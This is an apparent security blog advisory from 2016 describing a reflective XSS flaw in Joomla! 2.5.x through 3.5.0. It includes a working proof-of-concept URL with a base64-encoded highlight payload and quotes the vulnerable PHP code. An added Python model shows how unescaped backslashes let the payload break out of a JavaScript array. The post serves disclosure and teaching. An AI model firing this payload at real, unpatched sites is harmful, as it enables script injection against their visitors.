jeffchannell.com

Joomla! 2.5.x/3.5.0 XSS

Posted in Joomla!
2016-06-06 07:06:05 +0000 UTC

Joomla! versions before 3.5.0, including the 2.5.x series (likely all the way back to 1.6.0, no regression testing done) are vulnerable to reflective XSS:

Joomla! 3.5.0 Reflective XSS
============================

http://[joomla site]/index.php?option=com_finder&highlight=WyJcXCIsIl0pO2FsZXJ0KDEpO1wvXC9cXCJd

Decoded payload: ["\\","]);alert(1);\/\/\\"]

How it works: the highlight plugin decodes the payload from base64 then from JSON,
then iterates over the resulting array and attempts to clean each entry before
passing to the "highlighter" behavior.

The highlighter behavior code "escapes" double quotes by replacing them with \",
but it does not escape backslashes. A term that ends in a backslash therefore
swallows the quote that follows it (the browser reads \" as an escaped quote
inside the string), the string literal ends one quote later than intended, and
the remainder of the payload breaks out of the imploded array and executes as code.

plugins/system/highlight/highlight.php

                // Get the terms to highlight from the request.
                $terms = $input->request->get('highlight', null, 'base64');
                $terms = $terms ? json_decode(base64_decode($terms)) : null;

                // Check the terms.
                if (empty($terms))
                {
                        return true;
                }

                // Clean the terms array.
                $filter = JFilterInput::getInstance();

                $cleanTerms = array();

                foreach ($terms as $term)
                {
                        $cleanTerms[] = htmlspecialchars($filter->clean($term, 'string'));
                }

                // Activate the highlighter.
                JHtml::_('behavior.highlighter', $cleanTerms);


libraries/cms/html/behavior.php

                $terms = str_replace('"', '\"', $terms);

                $document = JFactory::getDocument();
                $document->addScriptDeclaration("
                        jQuery(function ($) {
                                var start = document.getElementById('" . $start . "');
                                var end = document.getElementById('" . $end . "');
                                if (!start || !end || !Joomla.Highlighter) {
                                        return true;
                                }
                                highlighter = new Joomla.Highlighter({
                                        startElement: start,
                                        endElement: end,
                                        className: '" . $className . "',
                                        onlyWords: false,
                                        tag: '" . $tag . "'
                                }).highlight([\"" . implode('","', $terms) . "\"]);
                                $(start).remove();
                                $(end).remove();
                        });
                ");
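To make the two snippets above concrete, here is an added Python model (not Joomla's code): it decodes the PoC parameter the way the plugin does, builds the JavaScript array literal both the 3.5.0 way and with a real JSON encoder, and a small scanner that reads JS string literals with their escapes shows where a browser would see the array close. The JFilterInput "string" clean is approximated with htmlspecialchars only, and json.dumps stands in for a proper fix on the assumption that a JSON encoder is the right tool; what the linked PR actually changed is not asserted here.

```python
import base64
import html
import json

# Constructed copy of the advisory's PoC value for the 'highlight' parameter.
POC_HIGHLIGHT = "WyJcXCIsIl0pO2FsZXJ0KDEpO1wvXC9cXCJd"


def decode_terms(highlight_param):
    # Mirror highlight.php: base64 -> JSON -> clean each entry. JFilterInput's
    # 'string' clean is approximated by htmlspecialchars (assumption); neither
    # step touches backslashes, which is what the payload relies on.
    terms = json.loads(base64.b64decode(highlight_param))
    return [html.escape(str(t), quote=True) for t in terms]


def build_vulnerable(terms):
    # behavior.php in 3.5.0: turn " into \" and implode with "," between terms.
    escaped = [t.replace('"', '\\"') for t in terms]
    return '["' + '","'.join(escaped) + '"]'


def build_fixed(terms):
    # Hardened variant: a JSON encoder escapes backslashes as well as quotes
    # (PHP's json_encode does the same; assumed here, not taken from the PR).
    return json.dumps(terms)


def array_literal_end(js):
    # Index of the ']' that ends the array as a JS parser reads it: track
    # double-quoted string state and honour backslash escapes.
    in_string, i = False, 0
    while i < len(js):
        c = js[i]
        if in_string:
            if c == "\\":
                i += 1  # next character is escaped, skip it
            elif c == '"':
                in_string = False
        elif c == '"':
            in_string = True
        elif c == "]":
            return i
        i += 1
    return -1


def trailing_code(js):
    # Source left after the array closes; anything here is executed as JS.
    return js[array_literal_end(js) + 1:]
```

For the PoC terms the 3.5.0 builder leaves `);alert(1);//\"]` outside the array literal, while the JSON-encoded form closes exactly at its last character.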

Fixed in 3.5.1: https://github.com/joomla/joomla-cms/pull/9524